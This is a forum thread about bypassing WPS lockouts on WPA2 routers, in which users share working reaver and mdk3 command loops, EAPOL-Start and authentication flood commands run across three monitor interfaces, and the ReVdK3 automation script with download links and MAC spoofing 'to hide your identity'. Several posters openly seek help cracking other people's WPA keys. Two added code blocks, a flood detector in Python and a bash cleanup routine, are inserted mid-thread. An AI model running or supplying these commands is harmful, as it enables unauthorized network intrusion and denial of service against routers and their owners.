
Thread: MDK3 Secret Destruction Mode

  1. #101

    Original Posting - Content Deleted

    Hello All,

    Any clue where the original posting went? I was showing a buddy the guide that was written out, but noticed it says content deleted. Does anyone have the original?

    Thanks!

  2. #102
    Hello All,

    Any clue where the original posting went? I was trying to show a buddy the post, but noticed the "Content Deleted" on the original post. Anyone have the original guide?

  3. #103
    Quote Originally Posted by shaberu View Post
    try reaver with -L to ignore locks and -a to auto select better configurations
    Code:
    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -L -a



    Thank you very much!! It helped but didn't solve my problem... I used your code and at least I didn't get the "re-trying in 60 seconds" thing, but it is stuck on 0.04% and doesn't want to go further... so it's the same as it would be with the 60 seconds retrying.

    I'm really confused how I could hack this WPS locked WPA2-PSK router...

    Maybe you could tell me your email so we can talk, or TeamViewer or VNC? Or if you don't want that we can keep messaging here! I don't want to give up. And thanks everyone for helping!

    Just please someone tell me what to do. Maybe I didn't unlock the WPS successfully?

  4. #104
    Quote Originally Posted by shaberu View Post
    try reaver with -L to ignore locks and -a to auto select better configurations
    Code:
    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -L -a
    Even on those routers that don't have WPS locks I get the same response with reaver... for 10-30 mins. They get stuck on 0.04% and I get this error message: "WPS transaction failed (code 0x02)". What am I doing wrong? How can I do it successfully?

  5. #105
    Have a look here http://code.google.com/p/reaver-wps/.../detail?id=167

    I haven't read through it myself but that is the main area for problems related to reaver, or do a google search for "WPS transaction failed (code 0x02)".

    Rab.

  6. #106
    Here is what I am using to get around locks...
    Code:
    while :; do echo
    echo "starting reaver...";
    echo y|reaver -i mon0 -b <bssid> -c <channel#> -g 5 -vv
    echo ...
    echo ...
    echo ...
    timeout 10s mdk3 mon0 a -a <bssid> -m
    sleep 60
    done

    First off, you need to run "apt-get timeout install" to get the timeout app. After that the script should work. The first part starts reaver, restores the session and executes 5 attempts before exiting. The second part executes the mdk3 command, which will time out after 10 seconds of running. At this point, the router should be rebooting (at least the one I'm trying it on did). Next, a sleep for 60 seconds allows the router to reboot, and then the script loops back to the beginning.

  7. #107
    Hello FAHQ, please please explain more, how can I put in the commands?

  8. #108
    Hello, is there any help from you FAHQ?

  9. #109
    Hello ppl, is there any trick to unlock locked WPS?

  10. #110
    Any clue guys?

  11. #111
    Quote Originally Posted by saido5 View Post
    Hello FAHQ, please please explain more, how can I put in the commands?
    Make a blank document in your root folder called reset.sh. Then, open the document in a text editor and paste this into it:
    Code:
    while :; do echo
    echo "starting reaver...";
    echo y|reaver -i mon0 -b <bssid> -c <channel#> -g 5 -vv
    echo ...
    echo ...
    echo ...
    timeout 10s mdk3 mon0 a -a <bssid> -m
    sleep 60
    done
    Replace the values inside the code with the values of your target. If you don't know what I mean by that, then learn the basics of aircrack and reaver.

    When you're done, open terminal and run:
    Code:
    bash reset.sh

  12. #112

    Another effective way to reset a wps access point

    Quote Originally Posted by saido5 View Post
    Hello ppl, is there any trick to unlock locked WPS?

    To everyone: another effective method to unlock the WPS mechanism on a WPS router!

    Quote Originally Posted by repzeroworld View Post
    TO: EVERYONE - EFFECTIVE WAY TO RESET A MODERN CISCO ACCESS POINT BY FLOODING FOR 10-20 SECONDS!
    I have found a way to effectively flood a new model (manufactured in either 2012 or 2013) Cisco router to make it reboot with a WPS locked
    status of "NO". Also I will prove that using Authentication DOS mode flooding has no effect on THIS router!


    DETAILS OF THIS ROUTER

    From one of the M1 EAP packets captured from my wireless card, details of this router are as follows

    bssid c8:d7:19:0a:bf:35
    Manufacturer: Cisco
    Model Number: 123
    Serial Number: 12345
    Model Name: WAP
    Channel type: 802.11g (pure-g) (0x00c0)

    I did some research using these details and found out that this access point was modern in age.

    Behaviour of this CISCO Router

    This type of router is not affected by a script changing your MAC address. Also, if you try 3 pins, the router starts
    an exponential clock that rate limits another couple of pins reaver tries, and then the router totally locks itself for one/two days.
    Even if I gave reaver the option to try 1 pin every 3 minutes (worthless)... after a couple of pin attempts it locks up for one/two days.
    I will release my method for sure... give me a couple of days for a nice video presentation!

    EFFECTS OF USING MY METHOD

    I haven't seen anyone discussing the method which I am going to reveal, but it relates to using mdk3.

    After using my method the router reboots and it needs some time to "thaw off" before sending EAP again... this is roughly around
    a couple of seconds. If you don't leave it to thaw off and use the reaver command, you will receive a lot of EAP timeout messages before
    the router catches itself, but it is worth it rather than waiting for days for the router to unlock itself!! Also, it hops to another channel when it reboots, so it
    is not wise to run reaver with a -c flag... I suppose this COULD be part of Cisco's security mechanism feature.

    ANOTHER EFFECTIVE WAY TO REBOOT A WPS ACCESS POINT AND RESET WPS LOCKED STATUS TO “NO”

    THIS LINK *REMOVED* HAS A VIDEO I HAVE DONE TO SHOW HOW I USE THE TWO ATTACKS AND WHICH ONE WAS MORE EFFECTIVE WITH THIS PARTICULAR AP.

    BRIEF NOTES
    I focused on the stated Cisco Access Point that I came across with the new exponential wps mechanism.

    THE TWO ATTACKS I USED ARE:
    1. MDK3 Authentication DOS Flood Attack - floods the AP with too many fake clients so that the router is overloaded
    2. EAPOL Start Flood Attack - authenticates to the AP and sends too many EAPOL Start requests so that the router is unable to respond to the volume of EAPOL requests and reboots itself.

    MDK3 AUTHENTICATION DOS FLOOD ATTACK
    This attack is useful on SOME routers. The important point to note is HOW I USE THESE ATTACKS!
    (I have three wireless adapters, AWUS036NHA, AWUS036NH and TP-LINK 722N, and I used AWUS036NHA and AWUS036NH to carry out this attack numerous times.)
    HOW I ATTACKED THIS ACCESS POINT USING AUTHENTICATION DOS FLOOD ATTACK
    I started my wireless card on three monitor interfaces, mon0, mon1 and mon2.
    In three terminals, I used the command lines:
    Code:
    mdk3 mon0 a -a C87:19:0A:BF:35 #TERMINAL 1
    mdk3 mon1 a -a " " " #TERMINAL 2
    mdk3 mon1 a -a " " " #TERMINAL 3
    Note:
    I ensured that the router was WPS locked permanently so that I could test the effectiveness of the attack. Also, a point to note, I did not use one command line with one monitor interface since it was futile. I blasted the router on three monitor interfaces! Now I am blasting away at the router for hours! After blasting away, the Access Point is still locked! I tried this attack for days to convince myself!


    MDK3 EAPOL START FLOOD ATTACK
    I started my wireless card on three monitor interfaces, mon0, mon1 and mon2.
    Code:
    mdk3 mon1 x 0 -t C87:19:0A:BF:35 -n Riznet -s 100 #TERMINAL 1 (SEE VIDEO FOR REASON OF USING -s 100 FLAG)
    mdk3 mon1 x 0 -t " " " -n Riznet -s 100 #TERMINAL 2
    mdk3 mon1 x 0 -t " " " -n Riznet -s 100 #TERMINAL 3
    Note: I tried again using 1 monitor interface to carry out the attack, but it took hours for the router to reboot and I was not sure if the attack was the main reason for the router rebooting! In this scenario I tried blasting the router in three terminals. This "Shock Attack" method ran for about 20 seconds and the router rebooted with WPS locked status as "NO". I TRIED THIS ATTACK A COUPLE MORE TIMES FOR ABOUT 20 SECONDS WITH THE ACCESS POINT REBOOTING AND UNLOCKING ITSELF (WPS)!! Also, packet analysis significantly helped me to understand the connection between EAPOL and router behaviour towards open authentication requests, which makes it impossible to stick to one method for flooding ALL APs (see the video link above).

    BASH SCRIPT WRITING
    Soon I will write a bash script to execute all the steps in my video (I need time to chill….).

    OTHER ACCESS POINTS INVESTIGATED
    I have also assessed the behaviour of three other Cisco access points that rate limit pins in a systematic way but did not lock up in an exponential manner! I will give an update if I come across any other access points that behave somewhat differently. Do share your experience in relation to any new updates on WPS!
    Last edited by g0tmi1k; 2014-12-09 at 15:12. Reason: Youtube
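    A defender's-side counterpart to the two floods described in the post above, as an added example that is not from the thread or from any script mentioned in it: it counts EAPOL-Start frames per transmitter and per AP, and distinct Authentication sources per AP, over one-second windows of a decoded capture. The frame records, the client and attacker MACs, the frame-kind labels and the thresholds are constructed assumptions for this example; only the AP BSSID and the 100 frames/s rate come from the post.

```python
"""Detection of the floods discussed in post #112 (EAPOL-Start flood and
Authentication DoS flood) from decoded monitor-mode capture records.

Added example; not code from the thread. Record layout and frame-kind
labels are assumptions: (timestamp_seconds, transmitter, receiver, kind).
"""
from collections import defaultdict

AP_BSSID = "c8:d7:19:0a:bf:35"          # BSSID quoted in post #112
LEGIT_CLIENT = "aa:bb:cc:dd:ee:ff"      # constructed legitimate client
ATTACK_SRCS = ["02:00:00:00:00:01",     # constructed: one MAC per monitor
               "02:00:00:00:00:02",     # interface, as the post uses mon0..2
               "02:00:00:00:00:03"]


def build_sample():
    """Constructed capture: three sources each send EAPOL-Start at
    100 frames/s (the post's -s 100) for 5 s; 200 spoofed addresses send
    Authentication frames during second 1; one legitimate client does a
    normal auth / assoc / EAPOL exchange in second 0."""
    frames = []
    for sec in range(5):
        for mac in ATTACK_SRCS:
            for i in range(100):
                frames.append((sec + i / 100.0, mac, AP_BSSID, "eapol-start"))
    for i in range(200):
        spoofed = "06:00:00:00:%02x:%02x" % (i // 256, i % 256)
        frames.append((1.0 + i / 200.0, spoofed, AP_BSSID, "auth"))
    frames += [
        (0.50, LEGIT_CLIENT, AP_BSSID, "auth"),
        (0.55, LEGIT_CLIENT, AP_BSSID, "assoc-req"),
        (0.60, LEGIT_CLIENT, AP_BSSID, "eapol-start"),
        (0.65, LEGIT_CLIENT, AP_BSSID, "eapol-key"),
    ]
    frames.sort()
    return frames


def _bucket(ts, window):
    return int(ts // window)


def eapol_start_peaks(frames, window=1.0):
    """Peak EAPOL-Start count per window, keyed by (transmitter, AP)."""
    counts = defaultdict(lambda: defaultdict(int))
    for ts, src, dst, kind in frames:
        if kind == "eapol-start":
            counts[(src, dst)][_bucket(ts, window)] += 1
    return {key: max(b.values()) for key, b in counts.items()}


def ap_eapol_start_peak(frames, bssid, window=1.0):
    """Peak EAPOL-Start count per window aimed at one AP, regardless of
    source. This still fires when every interface uses a different MAC."""
    counts = defaultdict(int)
    for ts, src, dst, kind in frames:
        if kind == "eapol-start" and dst == bssid:
            counts[_bucket(ts, window)] += 1
    return max(counts.values()) if counts else 0


def auth_source_peak(frames, bssid, window=1.0):
    """Peak number of distinct transmitters sending Authentication frames
    to the AP per window; a fake-client flood shows hundreds at once."""
    srcs = defaultdict(set)
    for ts, src, dst, kind in frames:
        if kind == "auth" and dst == bssid:
            srcs[_bucket(ts, window)].add(src)
    return max(len(s) for s in srcs.values()) if srcs else 0


def alerts(frames, bssid, src_rate=20, ap_rate=50, auth_sources=30):
    """Return (flooding transmitters, triggered condition names).
    Thresholds are constructed for this example, not taken from a standard."""
    flooding = sorted(src for (src, dst), peak in eapol_start_peaks(frames).items()
                      if dst == bssid and peak >= src_rate)
    conditions = []
    if ap_eapol_start_peak(frames, bssid) >= ap_rate:
        conditions.append("eapol-start-flood")
    if auth_source_peak(frames, bssid) >= auth_sources:
        conditions.append("auth-dos-flood")
    return flooding, conditions


if __name__ == "__main__":
    print(alerts(build_sample(), AP_BSSID))
```

    The legitimate client's single EAPOL-Start stays below every threshold, while the per-AP aggregate catches the flood even when the per-source counts are split across spoofed addresses.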

  13. #113
    Your approach is both novel and intriguing. Those involved with the matter of resetting routers remotely should study this closely.

    We realize successful WPS reset is dependent on a number of factors, to include router make, signal strength and clients associated, just to name a few. However Musket Teams will attempt to duplicate your results - however we will only report if we are successful.

  14. #114
    Hello friends, thank you so much soxrok2212, you are a great guy, I am so grateful for your help.

  15. #115
    Quote Originally Posted by zenefuleimnek View Post
    Thank you for the reply! What should appear with "wash"? What should I see when I open that?

    Because when I type wash -i mon0

    This is what I can see:

    Found packet with bad FCS, skipping...
    Found packet with bad FCS, skipping...
    Found packet with bad FCS, skipping...
    Found packet with bad FCS, skipping...
    Found packet with bad FCS, skipping...

    And I don't know when I can start reaver to get the WPA2 key. Please help me.
    Instead of "wash -i mon0 -c" you can try "wash -i mon0 -C" (capital C); it will ignore bad packets. Another reason could also simply be that the adapter is receiving bad packets that cannot be fully interpreted by the wash tool.

  16. #116
    Quote Originally Posted by polyphemus View Post
    Mine also reported "INVULNERABLE". I have a Netgear WNDR3400 N600. I was running the attacks and it looked like nothing happened....but then I woke up today and the router was dead. Had to do a hard reboot to get it back up. I don't know if maybe the router has some huge cache/buffer and just needed to catch up, or my internet dropped off for some reason. Thought it was noteworthy to share. Was at least 8 hrs since the "attack" though...would be cool if the former was true though!
    See comment #112, hope it helps in some way! Enjoy.

  17. #117
    ..........
    Last edited by repzeroworld; 2014-04-13 at 15:32.

  18. #118
    TO: EVERYONE - THREE OTHER ACCESS POINTS THAT WERE DEFEATED BY THE MDK3 EAPOL START ATTACK!!
    I have underestimated this attack! IT WORKS ON ALMOST ALL THE APs THAT I PICKED UP THAT HAVE THE WPS RATE LIMITING FEATURE..
    Despite some APs refusing to accept too many EAPOL packets, once mdk3 authenticates it floods the AP quickly until a deauthentication
    packet is sent from the AP to break the connection.

    FOR FURTHER PROOF CHECK ANOTHER VIDEO POSTED ON MY CHANNEL
    LINK *REMOVED*


    Also, instead of running three attacks in three terminals, I used one terminal to carry out three attacks RUNNING AT THE SAME TIME using:

    EXAMPLE
    Code:
    timeout <seconds> mdk3 mon0 x 0 -t <bssid> -n <essid> -s <no. of packets/sec> & timeout <seconds> mdk3 mon1 x 0 -t <bssid> -n <essid> -s <no. of packets/sec> & timeout <seconds> mdk3 mon2 x 0 -t <bssid> -n <essid> -s <no. of packets/sec>

    PENDING: I AM CURRENTLY WRITING A GENERAL INTERACTIVE BASH SCRIPT TO CARRY OUT ANY MDK3 ATTACK USING MY METHOD WITH REAVER! I WILL POST ONCE FULLY FINISHED. IF ANYONE HAS A SCRIPT FOR REAVER AND MDK3 (TO CARRY OUT ANY ATTACKS) DO SHARE SO THAT I CAN COMPARE IT WITH MY WORK IN PROGRESS SCRIPT!
    Last edited by g0tmi1k; 2014-12-09 at 15:11. Reason: Youtube

  19. #119

    RevdK3.sh Script- reaver and mdk3

    I have finally finished a script that took me a couple of days to complete. I would be grateful if others can test this out. What the script does:
    1. It asks the user for information on the target
    2. It runs reaver and waits until reaver detects the AP is rate limiting pins
    3. When the AP is rate limiting pins, the script pauses reaver and floods the AP for a time you choose
    4. After flooding, it detects if the AP is still rate limiting pins; if it is, then it continues to flood the AP until it unlocks itself
    5. Once WPS is unlocked, the script continues reaver

    Those interested in testing can send me an email or a private message on my channel.
    *REMOVED*
    Cheers!

    The script is also shared through torrent but it takes a while to upload. The link below is the location of the torrent:
    http://www.legittorrents.info/index....&page=torrents
    Last edited by g0tmi1k; 2014-12-09 at 15:11. Reason: youtube

  20. #120
    Wow, I never expected to see this thread reach 50,000 views. I guess it's pretty popular. I'm very doubtful here, but is there anyone who knows how to make a full GUI with all the methods posted by various users here? It would include options of:
    1.) mac changing after a specified number of pin trials
    2.) reaver incorporated, of course ;D
    3.) MDK3 auth flood
    4.) beacon flood
    5.) MIC failure
    6.) deauth
    7.) EAPOL failure

    More??

    It would just be nice to have a full GUI for EVERYTHING posted by users here... plus having a few terminal windows open and typing in the commands every time is a bit annoying. I'm not talking a script here, a full blown GUI.

    I'm doubtful but the community here is pretty big. And maybe, just maybe we could get it pushed to be a standard tool in Kali!

  21. #121
    Musket Teams wish to note that there are no mac address spoofing routines written into ReVdK3. Users will be broadcasting using their hardware installed mac address. We have no comment on the program itself as until we write these routines into the script we will only do cursory tests.

  22. #122

    To: Everyone

    Quote Originally Posted by mmusket33 View Post
    Musket Teams wish to note that there are no mac address spoofing routines written into ReVdK3. Users will be broadcasting using their hardware installed mac address. We have no comment on the program itself as until we write these routines into the script we will only do cursory tests.
    Please note I have written the little script ReVdK3 for free distribution and to contribute worthily to the Kali Linux forum and mdk3 team;
    it is COMMON COURTESY for any team or individual that wants to improve this script to request my consent or create the script
    with an invented name of their own. This is because improvement of this script is set aside by me in the near future.... thank you...

  23. #123
    A Peer Review of ReVdK3

    This thread will not discuss the ability of Revdk3 to actually reset a router.

    Musket Teams have been working with soxrox2212 since this mdk3 approach to reset routers remotely was conceived. The current ReVdK3 approach by repzeroworld is novel, hence once we got a copy of the program we tested it in our lab.
    This program tries to run three(3) mdk3 attacks from a single terminal window process using $MON1, $MON2 and $MON3 (ie mon0, mon1, mon2). We have tested the stock ReVdK3 and find no indication that $MON2 and $MON3 are functioning.

    When running ReVdk3 against the targetAP, Airodump-ng clearly shows only one(1) mdk3 process running.

    To prove these processes were not masking themselves one over the other:

    We ran the three(3) processes in separate terminal windows, first manually, then in Eterm and Xterm windows. Airodump-ng clearly shows all three(3) processes functioning when run from separate terminal windows, and only one(1) process when running RevdK3.

    To further prove this we gave each monitor ie $MON1, $MON2, $MON3 an individual mac address. When running the three(3) mdk3 attacks from Eterm windows embedded in the reVdk3 program these different mac addresses were expressed in the Eterm window AND airodump-ng showed data transference from these three(3) monitor/mac address pairs. When we ran the stock ReVdk3 only a single process running $MON1 was seen.

    We believe the author's original approach using three(3) terminal windows was the correct one.

    If you want to run three(3) separate processes off the physical device $WLAN from a bash script you need to run Eterm or Xterm windows, one(1) for each process.

    As the author has expressed a desire to view other work on the subject, a copy of a possible Eterm window solution starting at line 438 in the stock program can be seen below:

    if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then

    Eterm -g 80x10-1-400 --cmod "red" -T "Packet Flood $MON1" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON1 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    Eterm -g 80x10-1-250 --cmod "red" -T "Packet Flood $MON2" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    Eterm -g 80x10-1-70 --cmod "red" -T "Packet Flood $MON3" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    fi

    killall -q Eterm &> /dev/null


    MTA and MTD
    Last edited by mmusket33; 2014-05-06 at 06:14.

  24. #124
    Quote Originally Posted by mmusket33 View Post
    A Peer Review of ReVdK3

    This thread will not discuss the ability of Revdk3 to actually reset a router.

    Musket Teams have been working with soxrox2212 since this mdk3 approach to reset routers remotely was conceived. The current ReVdK3 approach by repzeroworld is novel, hence once we got a copy of the program we tested it in our lab.
    This program tries to run three(3) mdk3 attacks from a single terminal window process using $MON1, $MON2 and $MON3 (ie mon0, mon1, mon2). We have tested the stock ReVdK3 and find no indication that $MON2 and $MON3 are functioning.

    When running ReVdk3 against the targetAP, Airodump-ng clearly shows only one(1) mdk3 process running.

    To prove these processes were not masking themselves one over the other:

    We ran the three(3) processes in separate terminal windows, first manually, then in Eterm and Xterm windows. Airodump-ng clearly shows all three(3) processes functioning when run from separate terminal windows, and only one(1) process when running RevdK3.

    To further prove this we gave each monitor ie $MON1, $MON2, $MON3 an individual mac address. When running the three(3) mdk3 attacks from Eterm windows embedded in the reVdk3 program these different mac addresses were expressed in the Eterm window AND airodump-ng showed data transference from these three(3) monitor/mac address pairs. When we ran the stock ReVdk3 only a single process running $MON1 was seen.

    We believe the author's original approach using three(3) terminal windows was the correct one.

    If you want to run three(3) separate processes off the physical device $WLAN from a bash script you need to run Eterm or Xterm windows, one(1) for each process.

    As the author has expressed a desire to view other work on the subject, a copy of a possible Eterm window solution starting at line 438 in the stock program can be seen below:

    if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then

    Eterm -g 80x10-1-400 --cmod "red" -T "Packet Flood $MON1" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON1 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    Eterm -g 80x10-1-250 --cmod "red" -T "Packet Flood $MON2" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    Eterm -g 80x10-1-70 --cmod "red" -T "Packet Flood $MON3" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 100; bash" &

    sleep 2

    fi

    killall -q Eterm &> /dev/null


    MTA and MTD
    When ReVdK3 was distributed, the script was revised shortly afterwards to correct this problem using a tricky method and was given to my acquaintances who willingly volunteered to test. For a second reminder see below.

    "Please note I have written the little script ReVdK3 for free distribution and to contribute worthily to the Kali Linux forum and mdk3 team;
    it is COMMON COURTESY for any team or individual that wants to improve this script to request my consent or create the script
    with an invented name of their own. This is because improvement of this script is set aside by me in the near future.... thank you..."

  25. #125

    Improvements to ReVdK3.sh

    ReVdK3 had some issues that I wasn't aware of when it was first distributed.
    I became aware of these bugs when viewers tested the script and provided me with their feedback....
    Thank you to those people who provided feedback that helped me trace where the problems were...
    Some of the problems were as follows:

    1. Whenever the script ran and was terminated, bash left mdk3 running in the background (the "while ; do loop problem"). If the script was restarted
    this resulted in duplication of many mdk3 processes, which affected not only the mdk3 attack but also reaver and the monitor interfaces
    - this issue was fixed by killing all mdk3 processes after running and looping again.

    2. The first distributed script ran the mdk3 EAPOL start flood attack in one terminal! (The script was functioning, but it was how bash was interpreting the instructions)... now all three EAPOL start attacks will run in three little terminals! - issue fixed using the gnome-terminal command.

    3. I increased the number of packets injected for EAPOL attacks to help reboot one of the access points that took long to reboot/unlock (WPS).


    4. I added instructions to the script to change the MAC address of your monitor and wireless interfaces... this is to help hide your identity.

    The old script was taken off the torrent link. The link for the new script is below:

    http://www.legittorrents.info/index....&page=torrents


    NOTE:
    MDK3 WILL NOT RESET ALL ROUTERS BASED ON FEEDBACK BUT IS VERY USEFUL. As a result, the revised script can be downloaded
    from the link stated.
    Last edited by repzeroworld; 2014-05-10 at 13:32.

  26. #126
    If anyone is having trouble in reaver associating to an AP, make sure your wireless card supports wireless N because the target AP may be in N only mode.

  27. #127
    soxrok2212

    Could you recommend a few wifi adapters supporting N that work with Kali? From a sources of supply perspective, could you recommend more than one?

    MTA

  28. #128
    I just purchased an Alfa AWUS051NH on eBay for about $35. It should be delivered within a couple of days and I'll report back after some testing. It's a dual band 150/300mbps card so I should see some speed increases over my AWUS036H, and based on some reviews, it looks pretty promising.

  29. #129
    Got my hands on an Alfa AWUS051NH and I love it. Rt2800 drivers, injection works, and I definitely prefer it over my AWUS036H because the PWR levels in airodump-ng are much more accurate (I don't think it's as powerful though...). I haven't extensively tested injection rates yet but it seems very promising. Excellent range too and only about $33 on eBay.
    Last edited by soxrok2212; 2014-05-30 at 01:41.

  30. #130
    Have you tried boosting the power levels? The routine we use to avoid the negative one issue also boosts an RTL8187 to 30dBm. See our thread Simple Solution to negative one issue. You can download the routines there, or we can post them or send them to you if you wish.

    MTA

  31. #131
    Musket Teams have been working on a different approach to WPS locked routers. Instead of attempting to reset a WPS locked router, we attempted to prevent router WPS locking. Targets were routers known to lock the WPS system after X number of pin requests. We flooded the router with various combinations of mdk3 attacks while simultaneously conducting a reaver attack.
    To date we have had little success! However for those writing reset router programs note the following.
    Reaver was always able to harvest pins while the router was being subjected to various combined mdk3 attacks. Hence there is no reason to start and stop reaver. You can leave it running in the background. If the router locks, no pins will be collected; if the router resets, pins will again be harvested even though multiple mdk3 attacks are assaulting the target AP.

  32. #132
    So basically if you run mdk3 concurrently with reaver it will never lock out?

  33. #133
    No we are not saying that.

    We have seen the following against routers in our areas of operation.

    If your target is a router whose WPS system is open BUT will lock after x number of pin attempts, then:

    1. If you run combinations of mdk3 against the router AND you run reaver at the same time, reaver will continue to collect pins until the router locks. The mdk3 attacks do not disrupt the collection of pins. We have seen routers freeze but no reset and then continue which is congruent with reaver collecting pins. What is important here is that you can run your mdk3 attack(s) and your reaver attack at the same time. Should the router reset reaver will begin collecting pins again until the router locks even though mdk3 is attacking the router. You do not have to run the mdk3 attack then stop the attack and run reaver and then stop reaver and run the mdk3 attack again. Just run both and walk away.

    The only problem here is that the router, when reset, might jump channels.

    For historical reference we had approx 10 target routers which were open. We ran mdk3-reaver attacks at the same time and locked all the routers.

    MTA

  34. #134
    Gotcha, so it's a bit more time efficient.

  35. #135
    Hi guys. Can you please modify your script for me so that it starts Reaver with the -L (ignore lock) option and then does 10 attempts and stops, after that starts only mdk3 (mdk3 a -a bssid -m) for another 40 secs and stops mdk3, and then resumes Reaver with the -L (ignore lock) option again, and loops like this until the WPS pin is found. Thanks a lot, waiting for your reply. (And please with only 1 monitor interface.)

  36. #136

    Revdk3-r1.sh release in a couple of days

    Quote Originally Posted by Berj View Post
    Hi guys. Can you please modify your script for me so that it starts Reaver with the -L (ignore lock) option and then does 10 attempts and stops, after that starts only mdk3 (mdk3 a -a bssid -m) for another 40 secs and stops mdk3, and then resumes Reaver with the -L (ignore lock) option again, and loops like this until the WPS pin is found. Thanks a lot, waiting for your reply. (And please with only 1 monitor interface.)
    Hello... I got your message... hectic working schedule these days... I will modify the script for your taste and send it... send me a private message with your email address on my channel or Kali..... I have finished working on a revision of the script, ReVdK3-r1.sh (revision 1).
    Some of the features of this revised script:
    1. Whenever 25 successive EAPOL failures are detected, the script will flood the AP for the specified time you choose (EAPOL start failures are caused by a variety of factors, but I decided to add this feature just to force an unresponsive Access Point to overload itself and do a FRESH reboot.)

    2. The script runs aireplay-ng and reaver in ONE terminal... it switches periodically between the two processes without terminating either of them, not SNAPSHOTS of reaver and mdk3..... also it keeps re-running aireplay in the event that it quits because of "no beacon frames" or other reasons.... I found that aireplay significantly adds persistence to the association process, despite the fact that reaver can associate by itself.

    3. Good housekeeping - the script will automatically remove temporary files associated with the script and ensure all processes are killed prior to a SINGLE (1) SIGINT (Ctrl C) or SIGHUP signal (closing the terminal).

    4. Introduced the -S flag in the reaver command line to speed up cracking...

    5. A couple of minor bug fixes

    Hmm..... One cold beer to "N1Ksan" who "pushed" me to do a revision and contributed some of the ideas above... not forgetting how many unstable versions of the script I sent him to test........

  37. #137
    Hey man, I sent you private message here in Kali, please send it to my email.

    I found out that on many TP-Link router models whose MAC address starts with "10-FE-ED", MDK3 (mdk3 a -a bssid -m) can be used for 30 seconds and then it will let you continue reaver for 10 attempts, and then do the same thing again and again. But the issue is that WPS will show Locked as Yes even after mdk3, but will let you continue with the ignore option -L. Your previous scripts I tried didn't reset those TP-Link routers, and didn't even let me continue with the ignore lock option.

    Best of luck and thanks again, will test it for you if you have other scripts.

  38. #138
    Hey friends, I want to test your scripts. I'm trying to crack WPA passwords but I fail in all tries. I need some help, some information about this you are working on. Send me a message please. PS: sorry for my English.

  39. #139
    I think I must say that one of my wifi cards broke itself using all the mdk3 codes at the same time pointing at a specific AP, and it was at its max power.
    In short, the card was not able to transmit again.

  40. #140
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Well, if you set it to max power you probably fried it...

  41. #141
    Join Date
    2013-Jun
    Posts
    125
    RELEASE OF REVDK3-R1.sh

    DOWNLOAD LINK

    http://www32.zippyshare.com/v/12811261/file.html

    ----------------------------------------
    ReVdK3-r1.sh (Revision 1 README Section)
    ----------------------------------------
    WARNING:
    Do not use this script without permission from the victim to carry out the specified attacks.

    This is the first official revision of the ReVdK3.sh script
    ----------------------------------------

    Script features in this revision

    1. Runs reaver and aireplay-ng in one terminal and continuously detects when reaver is rate limiting pins.
    After input of the wireless adapter interface, it checks to see if there are any monitor interfaces on that adapter. Any existing monitor interfaces are wiped out and three new monitor interfaces are created. The script also uses these interfaces during the attacking process. In the event that aireplay times out because of association issues or switches to "shared key open authentication", the script will re-run aireplay-ng.

    2. Runs mdk3 attacks until reaver detects that the WPS state of the AP has been unlocked. Once WPS has been unlocked it kills all mdk3 attacks and waits until reaver detects WPS has been locked again. This process goes on...

    3. Upon detection of 25 successive EAPOL start failures, the script floods the AP for 60 seconds to see if the AP will do a fresh reboot!

    4. Killing the script in a terminal will trigger it to remove all tmp files, force all processes started by the script to terminate and wipe out the three monitor interfaces it created. Be patient, about 1-2 seconds for termination of the script. Also, you can close the terminal instead of killing it; this will send a hang-up signal to do the necessary cleaning up.
    Last edited by repzeroworld; 2014-06-17 at 03:02. Reason: to change download link
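    The "one signal cleans everything up" behaviour described in feature 4 is a standard bash trap pattern. The block below is an added illustration, not the ReVdK3 script's own code: it assumes a hypothetical temp directory, uses sleep as a stand-in for the background workers, and leaves the monitor-interface removal as a comment.

```bash
#!/usr/bin/env bash
# Added example (not ReVdK3): background workers plus a single-shot cleanup
# handler that runs on the first SIGINT or SIGHUP and never re-enters.
set -u

# Hypothetical temp dir; the real script would also record its created interfaces here.
WORKDIR="$(mktemp -d "${TMPDIR:-/tmp}/cleanup-demo.XXXXXX")"
PIDFILE="$WORKDIR/pids"
CLEANED=0

# Launch a long-running worker (sleep stands in for a real tool) and record its PID.
start_worker() {
    sleep 300 &
    echo $! >> "$PIDFILE"
}

# Kill every recorded child, reap it, then delete the temp dir. Guarded so that a
# second Ctrl-C arriving mid-cleanup does not run the handler twice.
cleanup() {
    [ "$CLEANED" -eq 1 ] && return 0
    CLEANED=1
    if [ -f "$PIDFILE" ]; then
        while read -r pid; do
            kill "$pid" 2>/dev/null || true
        done < "$PIDFILE"
        # wait reaps the children so none linger as zombies before rm -rf
        while read -r pid; do
            wait "$pid" 2>/dev/null || true
        done < "$PIDFILE"
    fi
    # The real script would delete the interfaces it created here (iw dev <name> del).
    rm -rf "$WORKDIR"
    return 0
}

# Return 0 only if the temp dir is gone and none of the given PIDs is still alive.
cleanup_done() {
    [ ! -d "$WORKDIR" ] || return 1
    for pid in "$@"; do
        kill -0 "$pid" 2>/dev/null && return 1
    done
    return 0
}

# One handler serves both signals; exiting afterwards ends the script on ONE Ctrl-C.
trap 'cleanup; exit 130' INT
trap 'cleanup; exit 129' HUP
```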

  42. #142
    Join Date
    2014-Jun
    Posts
    1
    Quote Originally Posted by repzeroworld View Post
    RELEASE OF REVDK3-R1.sh

    DOWNLOAD LINK

    http://www.legittorrents.info/index....0ddb497eced5b7
    Please seed, I'd like to test this script.

  43. #143
    Join Date
